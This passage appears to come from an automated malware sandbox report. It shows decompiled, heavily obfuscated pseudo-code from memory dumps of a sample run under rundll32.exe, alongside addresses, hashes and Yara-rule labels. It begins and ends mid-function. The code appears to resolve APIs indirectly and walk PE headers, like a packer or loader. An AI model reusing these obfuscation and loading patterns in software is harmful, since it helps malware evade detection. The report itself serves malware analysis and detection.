				 *((intOrPtr*)(_t93 + 0x41c507)) = _t98;
				_a8 = _a8 ^ _t103;
				 *((intOrPtr*)(_t93 + 0x41c507)) =  *((intOrPtr*)(_t93 + 0x41c507)) - 0x2a9;
				_t111 = _v8;
				_v8 = ((_t71 + _a8 + _t103 ^ 0xffffffff) - _v12 - 0xfffffffffffffeb4 - _v8 - 0xffffffff + 0x00000001 ^ 0x000004b9) - 0x00000001 ^ 0;
				_a12 = _a12 ^ 0xffffffff;
				_a4 = _a4 + 0xffffffff;
				_v12 = _v12 | _t111;
				 *((intOrPtr*)(_t93 + 0x41ca6d)) =  *((intOrPtr*)(_t93 + 0x41ca6d)) + _t111;
				_v12 = _v12 | _t111;
				_t89 = E00EA292C((((_t71 + _a8 + _t103 ^ 0xffffffff) - _v12 - 0xfffffffffffffeb4 - _v8 - 0xffffffff + 0x00000001 ^ 0x000004b9) - 0x00000001 ^ 0) - 1, _t93,  *((intOrPtr*)(_t93 + 0x41cf4b)),  *((intOrPtr*)(_t93 + 0x41ce86)), _t103 - 1 + 1);
				 *((intOrPtr*)(_t93 + 0x41ca6d)) = 0xffffffff;
				_v8 = _v8 - 0xffffffff;
				_v8 = _v8 - 1;
				_a8 = _a8 - 1;
				return (_t89 ^ 0xfffffffffffffe25) - 1;
			}

0x00ea13c5
0x00ea13c5
0x00ea13d5
0x00ea13df
0x00ea13d7
0x00ea13d7
0x00ea13d7
0x00ea13e5
0x00ea13f0
0x00ea13f3
0x00ea13f9
0x00ea1404
0x00ea140f
0x00ea141b
0x00ea142a
0x00ea1452
0x00ea147b
0x00ea147e
0x00ea148d
0x00ea1491
0x00ea1495
0x00ea14af
0x00ea14b9
0x00ea14ce
0x00ea14d3
0x00ea14ec
0x00ea14f8
0x00ea14fd
0x00ea1509

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction ID: 06dcd19b145c165f88593da5fe61fd95413e9f1d4d49616f76dd124a1b9011ea
Opcode Fuzzy Hash: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction Fuzzy Hash: F431AD72C10629ABEB04CE39CC8979A7B71EF40770F14C36AAC249D4D9C7749660DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2566, Relevance: .1, Instructions: 84
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA2566(signed int __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t55;
				signed int _t60;
				signed int _t73;
				void* _t80;
				signed int _t81;
				void* _t93;

				_t80 = __ebx;
				_t55 = __eax;
				if(__ebx >= _t93) {
					_a4 = _a4 - 1;
				}
				_a4 = _a4 & 0x00000001;
				_v12 = _v12 - 1;
				_a4 = _a4 - 1;
				_t60 = ((_t55 ^ 0xffffffff) & 0) + 1;
				_v8 = _v8 + 0x40b;
				_v8 = _v8 ^ _t60;
				 *(_t80 + 0x41c9d8) =  *(_t80 + 0x41c9d8) ^ 0xffffffff;
				_v12 = _v12 & 0x00000000;
				 *(_t80 + 0x41c003) = 1;
				_a4 = _a4 ^ ((_t60 - 0x00000001 + _t60 - 0x00000001 + 0x00000001 & 0x00000000) - 0xffffffff & 0xfffffbfb ^ 0xffffffff) + 0x574;
				_t73 = E00EA7338((((_t60 - 0x00000001 + _t60 - 0x00000001 + 0x00000001 & 0x00000000) - 0xffffffff & 0xfffffbfb ^ 0xffffffff) + 0x574 & 0x00000001) - 0xfffffffffffffeed, _t80,  *((intOrPtr*)(_t80 + 0x41cdce)));
				_a4 = _a4 | _t73;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) ^ (_t81 | _a4) & _v12 ^ 0x00000000;
				_v8 = _v8 | 0xffffffe9;
				_v8 = 0xffffffff;
				 *(_t80 + 0x41c9d8) = _t73;
				 *(_t80 + 0x41c9d8) = 0xfffff81c;
				 *(_t80 + 0x41c9d8) = 0;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) & 0x00000440;
				_v12 = 0;
				_v12 = 0x3d2;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) - _t81 + 0xffffffff;
				_v12 = _v12 + 1;
				return 2;
			}

0x00ea2566
0x00ea2566
0x00ea2573
0x00ea2575
0x00ea2578
0x00ea2583
0x00ea2587
0x00ea258d
0x00ea25a2
0x00ea25b5
0x00ea25bc
0x00ea25bf
0x00ea25c6
0x00ea25e2
0x00ea2600
0x00ea2623
0x00ea2628
0x00ea262b
0x00ea2637
0x00ea263b
0x00ea2642
0x00ea2648
0x00ea265e
0x00ea2669
0x00ea2675
0x00ea2678
0x00ea2680
0x00ea2692
0x00ea26a8

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction ID: 87cd121d95c4f92c71c9f300336ce7f373821afbe64c5cdc0714c9523e2e4ec1
Opcode Fuzzy Hash: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction Fuzzy Hash: 5B31A2B3C106059BEB008F78CD863CA3A60EF55374F298369AD38EE1D1D37986919A94

Uniqueness

Uniqueness Score: -1.00%

Function 00EA92B2, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA92B2(signed int __eax, void* __ebx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t68;
				void* _t85;
				void* _t86;
				signed int _t91;
				void* _t92;
				signed int _t97;
				signed int _t98;
				void* _t101;

				_t85 = __ebx;
				_t101 = __eax - 0x2bdf;
				_t68 = E00EA1967(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41d155)));
				if(_t101 < 0) {
					_a8 = _a8 - 1;
				} else {
					_t91 = _t91 & 0x00000000;
					 *(__ebx + 0x41cd75) =  *(__ebx + 0x41cd75) ^ 0xfffffe87;
				}
				_t98 = _t97 ^ 0x000000ac;
				 *(_t85 + 0x41cd75) = _t98;
				_a8 = _a8 - 1;
				_v8 = _v8 ^ 0x00000001;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) ^ _t68;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + _t68 + 0xfffffe42;
				_a4 = _a4 & 0x000007d7;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + _t98 - 1;
				_v8 = _t86 + 1;
				_a8 = _a8 - 1;
				_v8 = _v8 ^ _t92 - 0xffffffff;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) & 0x00000000;
				 *(_t85 + 0x41cd75) = 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) - 1;
				_v8 = _v8 + 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) - 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) & 0xffffffff;
				_a8 = _a8 - _t91;
				_v8 = _v8 - 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + 0xffffffff;
				return (0xfffffffffffffdd8 ^ _t91) - 1;
			}

0x00ea92b2
0x00ea92bd
0x00ea92c8
0x00ea92cd
0x00ea92e1
0x00ea92cf
0x00ea92cf
0x00ea92d5
0x00ea92d5
0x00ea92e4
0x00ea92ea
0x00ea92f3
0x00ea92f6
0x00ea92fb
0x00ea9306
0x00ea9323
0x00ea9344
0x00ea934a
0x00ea934d
0x00ea9350
0x00ea9353
0x00ea935a
0x00ea9375
0x00ea9385
0x00ea938e
0x00ea9395
0x00ea939d
0x00ea93ad
0x00ea93bd
0x00ea93c0
0x00ea93df

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction ID: 8a34288769d4728d76412f27b15de9d0092c5380912b41778e9d9f87cc49473a
Opcode Fuzzy Hash: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction Fuzzy Hash: CC317032890704EBFB048F38D9857DA7BB0EF41329F5482BAEC159D1DAE3794610DA55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6908 Parent PID: 6836 rundll32.exeCOMMON

Executed Functions

Function 03465F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E03465F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
